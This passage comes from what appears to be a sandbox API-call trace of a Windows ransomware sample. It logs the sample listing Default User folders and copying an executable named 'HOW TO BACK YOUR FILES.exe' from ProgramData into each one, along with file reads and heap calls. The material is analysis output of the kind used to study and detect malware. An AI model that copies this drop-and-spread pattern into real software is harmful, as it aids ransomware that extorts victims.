dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.550] GetLastError () returned 0x0 [0078.550] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.550] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.550] CloseHandle (hObject=0x118) returned 1 [0078.550] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.550] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.550] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x547f0960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x547f0960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.550] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.550] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.550] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\SendTo", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\SendTo") returned="C:\\Documents and Settings\\Default User\\SendTo" [0078.550] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2510 | out: hHeap=0x2b0000) returned 1 [0078.550] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2620 | out: hHeap=0x2b0000) returned 1 [0078.550] lstrlenW (lpString="C:\\Documents and Settings\\Default User\\SendTo") returned 45 [0078.550] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\SendTo" | out: lpString1="C:\\Documents and Settings\\Default User\\SendTo") returned="C:\\Documents and Settings\\Default User\\SendTo" [0078.550] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.550] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\SendTo\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\sendto\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.551] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.551] GetLastError () returned 0x0 [0078.551] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.551] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.551] CloseHandle (hObject=0x118) returned 1 [0078.551] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.551] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.551] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\SendTo\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x54b5c900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54b5c900, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.552] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.552] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.552] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Searches", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Searches") returned="C:\\Documents and Settings\\Default User\\Searches" [0078.552] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f24a8 | out: hHeap=0x2b0000) returned 1 [0078.552] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2280 | out: hHeap=0x2b0000) returned 1 [0078.552] lstrlenW (lpString="C:\\Documents and Settings\\Default User\\Searches") returned 47 [0078.552] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Searches" | out: lpString1="C:\\Documents and Settings\\Default User\\Searches") returned="C:\\Documents and Settings\\Default User\\Searches" [0078.552] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.552] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Searches\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\searches\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.553] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.553] GetLastError () returned 0x0 [0078.553] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.553] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.553] CloseHandle (hObject=0x118) returned 1 [0078.553] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.553] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.553] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Searches\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5501f500, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5501f500, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.553] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.553] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.553] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Saved Games", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Saved Games") returned="C:\\Documents and Settings\\Default User\\Saved Games" [0078.553] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4940 | out: hHeap=0x2b0000) returned 1 [0078.553] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d25a0 | out: hHeap=0x2b0000) returned 1 [0078.554] lstrlenW (lpString="C:\\Documents and Settings\\Default User\\Saved Games") returned 50 [0078.554] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Saved Games" | out: lpString1="C:\\Documents and Settings\\Default User\\Saved Games") returned="C:\\Documents and Settings\\Default User\\Saved Games" [0078.554] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.554] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Saved Games\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\saved games\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.554] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.554] GetLastError () returned 0x0 [0078.554] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.554] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.554] CloseHandle (hObject=0x118) returned 1 [0078.554] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.555] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.555] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Saved Games\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x55280b00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55280b00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.555] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.555] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.555] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Recent", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Recent") returned="C:\\Documents and Settings\\Default User\\Recent" [0078.555] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2440 | out: hHeap=0x2b0000) returned 1 [0078.555] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23c0 | out: hHeap=0x2b0000) returned 1 [0078.555] lstrlenW (lpString="C:\\Documents and Settings\\Default User\\Recent") returned 45 [0078.555] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Recent" | out: lpString1="C:\\Documents and Settings\\Default User\\Recent") returned="C:\\Documents and Settings\\Default User\\Recent" [0078.555] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.555] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Recent\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\recent\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.556] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.556] GetLastError () returned 0x0 [0078.556] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.556] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.556] CloseHandle (hObject=0x118) returned 1 [0078.556] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.556] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.556] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Recent\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5533f1e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5533f1e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.556] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.556] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.557] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Recent\\CustomDestinations", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Recent\\CustomDestinations") returned="C:\\Documents and Settings\\Default User\\Recent\\CustomDestinations" [0078.557] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9d00 | out: hHeap=0x2b0000) returned 1 [0078.557] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d25a0 | out: hHeap=0x2b0000) returned 1 [0078.557] lstrlenW (lpString="C:\\Documents and Settings\\Default User\\Recent\\CustomDestinations") returned 64 [0078.557] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Recent\\CustomDestinations" | out: lpString1="C:\\Documents and Settings\\Default User\\Recent\\CustomDestinations") returned="C:\\Documents and Settings\\Default User\\Recent\\CustomDestinations" [0078.557] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.557] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Recent\\CustomDestinations\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\recent\\customdestinations\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.557] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.557] GetLastError () returned 0x0 [0078.557] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.557] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.558] CloseHandle (hObject=0x118) returned 1 [0078.558] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.558] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.558] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Recent\\CustomDestinations\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x553fd8c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x553fd8c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.558] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.558] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.558] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Recent\\AutomaticDestinations", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Recent\\AutomaticDestinations") returned="C:\\Documents and Settings\\Default User\\Recent\\AutomaticDestinations" [0078.558] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0078.558] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23c0 | out: hHeap=0x2b0000) returned 1 [0078.558] lstrlenW (lpString="C:\\Documents and Settings\\Default User\\Recent\\AutomaticDestinations") returned 67 [0078.558] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Recent\\AutomaticDestinations" | out: lpString1="C:\\Documents and Settings\\Default User\\Recent\\AutomaticDestinations") returned="C:\\Documents and Settings\\Default User\\Recent\\AutomaticDestinations" [0078.558] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.558] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Recent\\AutomaticDestinations\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\recent\\automaticdestinations\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.559] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.559] GetLastError () returned 0x0 [0078.559] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.559] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.559] CloseHandle (hObject=0x118) returned 1 [0078.559] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.559] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.559] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Recent\\AutomaticDestinations\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x554bbfa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x554bbfa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.559] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.559] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.559] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\PrintHood", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\PrintHood") returned="C:\\Documents and Settings\\Default User\\PrintHood" [0078.560] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e48d0 | out: hHeap=0x2b0000) returned 1 [0078.560] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2380 | out: hHeap=0x2b0000) returned 1 [0078.560] lstrlenW (lpString="C:\\Documents and Settings\\Default User\\PrintHood") returned 48 [0078.560] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\PrintHood" | out: lpString1="C:\\Documents and Settings\\Default User\\PrintHood") returned="C:\\Documents and Settings\\Default User\\PrintHood" [0078.560] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.560] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\PrintHood\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\printhood\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.560] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.560] GetLastError () returned 0x0 [0078.560] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.560] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.561] CloseHandle (hObject=0x118) returned 1 [0078.561] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.561] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.561] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\PrintHood\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49ec8e00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49ec8e00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.561] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.561] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.561] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Pictures", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Pictures") returned="C:\\Documents and Settings\\Default User\\Pictures" [0078.561] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f23d8 | out: hHeap=0x2b0000) returned 1 [0078.561] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2360 | out: hHeap=0x2b0000) returned 1 [0078.561] lstrlenW (lpString="C:\\Documents and Settings\\Default User\\Pictures") returned 47 [0078.561] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Pictures" | out: lpString1="C:\\Documents and Settings\\Default User\\Pictures") returned="C:\\Documents and Settings\\Default User\\Pictures" [0078.561] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.561] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Pictures\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\pictures\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.562] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.562] GetLastError () returned 0x0 [0078.562] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.562] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.562] CloseHandle (hObject=0x118) returned 1 [0078.562] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.562] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.562] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Pictures\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x55508260, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55508260, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.562] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.562] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.563] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\NetHood", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\NetHood") returned="C:\\Documents and Settings\\Default User\\NetHood" [0078.563] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2370 | out: hHeap=0x2b0000) returned 1 [0078.563] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2600 | out: hHeap=0x2b0000) returned 1 [0078.563] lstrlenW (lpString="C:\\Documents and Settings\\Default User\\NetHood") returned 46 [0078.563] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\NetHood" | out: lpString1="C:\\Documents and Settings\\Default User\\NetHood") returned="C:\\Documents and Settings\\Default User\\NetHood" [0078.563] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.563] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\NetHood\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\nethood\\how to back 